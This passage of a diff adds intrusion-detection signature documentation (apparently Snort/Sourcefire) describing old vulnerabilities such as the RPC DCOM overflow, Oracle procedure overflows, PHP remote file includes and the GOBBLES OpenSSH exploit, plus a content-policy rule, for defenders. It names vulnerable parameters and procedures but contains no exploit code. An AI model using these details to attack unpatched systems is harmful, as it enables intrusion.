+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1833.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1833
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "naked lesbians".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "naked lesbians".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/3331.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3331
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1805.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1805
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw on a 
+server running Oracle reports.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A stack overflow exists in the Oracle Reports "rwcgi60" program. If a 
+user supplies a long string as a value for the method "setauth", it can 
+overflow the stack and may allow the user to run code on the server. 
+This code would be executed with the permissions of the web server.
+
+--
+Affected Systems:
+	Oracle's Oracle Reports6i 6.0.8
+	Oracle9i Application Server Reports 9.0.2
+
+--
+Attack Scenarios:
+An attacker can overflow the stack using a URL and cause the machine to 
+execute shell code.
+
+--
+Ease of Attack:
+Medium
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4848
+
+--
--- /dev/null
+++ b/doc/signatures/1700.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1700
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/417.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+417
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Request datagram.
+
+--
+
+Impact:
+ICMP Information Request datagrams attempt to locate the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+--
+
+Detailed Information:
+This message is generated when a host attempts to locate the network number of the network segment it is located on..  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 15 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/366.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+366
+
+--
+Summary:
+ping is a standard networking utility that determines if a target host
+is up. This rule indicates that the ping originated from a host running
+Unix.
+
+--
+Impact:
+Information Disclosure. Ping can be used as a reconnaissance tool.
+
+--
+Detailed Information:
+ping sends an ICMP Echo Request packet to an IP address.  If a host is
+up at that address it will reply with an ICMP Echo Reply.  The reply
+includes the data portion of the echo packet.  The data included in the
+Echo Request varies across different operating system implementations.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker will often ping a machine to make sure it is up before
+attacking.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This program is also used legitimately by users and/or network
+administrators to troubleshoot problems.  It is possible to emulate this
+ping signature using another ping utility.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+ICMP packets can be blocked with a packet filtering firewall.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2873.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2873
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nvarchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2532.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2532
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2648.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2648
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_online" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck631.html
+
+--
--- /dev/null
+++ b/doc/signatures/310.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid: 310
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in SmartMax MailMax mailserver.
+
+--
+Impact:
+Serious. Execution of arbitrary code on the target server is possible.
+
+--
+Detailed Information:
+MailMax is an email server for Windows platforms. Certain versions of the software contain a vulnerability that can allow execution of arbitrary code on the server with the privileges of the user running MailMax.
+
+Affected Versions:
+	MailMax 1.0
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2312
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0404
+
+--
--- /dev/null
+++ b/doc/signatures/100000482.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000482
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "BoastMachine" application running on a webserver. 
+Access to the file "vote.php" using a remote file being passed as the "bmc_dir" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "bmc_dir" parameter in the "vote.php" script used by the 
+"BoastMachine" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BoastMachine
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2746.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2746
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure revoke_surrogate_repcat
+. This procedure is included in
+dbms_repcat_auth.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1285.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1285
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000141.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000141
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/1649.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1649
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2818.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2818
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_columns_to_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2367.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2367
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
--- /dev/null
+++ b/doc/signatures/2569.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2569
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1220.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1220
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3301.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3301
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2469.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2469
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1810.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+
+1810
+
+--
+Summary:
+This event is generated when an attack against an OpenSSH (v2.9 - 3.3) server using the GOBBLES exploit was successful.
+
+--
+Impact:
+Full system compromise with escalated privileges.
+
+--
+Detailed Information:
+This attack exploits the "remote challenge-response" vulnerability in older versions of OpenSSH servers. The vulnerability affects OpenSSH versions 2.9 through 3.3 that have the challenge response option enabled and that also use SKEY or BSD_AUTH authentication. 
+
+--
+Affected Systems:
+Any UNIX Servers that have vulnerable OpenSSH daemon running including but not limited to the following:
+	Mandrake Soft Linux 7.1, 7.2, 8.0, 8.1, 8.2
+	OpenBSD 3.0, 3.1
+	Red Hat Linux 7.0, 7.1, 7.2, 7.3
+	SuSe Linux 6.4, 7.0, 7.1, 7.2, 7.3
+
+--
+Attack Scenarios:
+An attacker first determines what version of OpenSSH the targeted machine is running then launches a publicly available GOBBLES exploit script against it.
+
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable S/Key and BSD Authentication by modifying the sshd_config file
+
+	ChallengeResponseAuthentication no
+
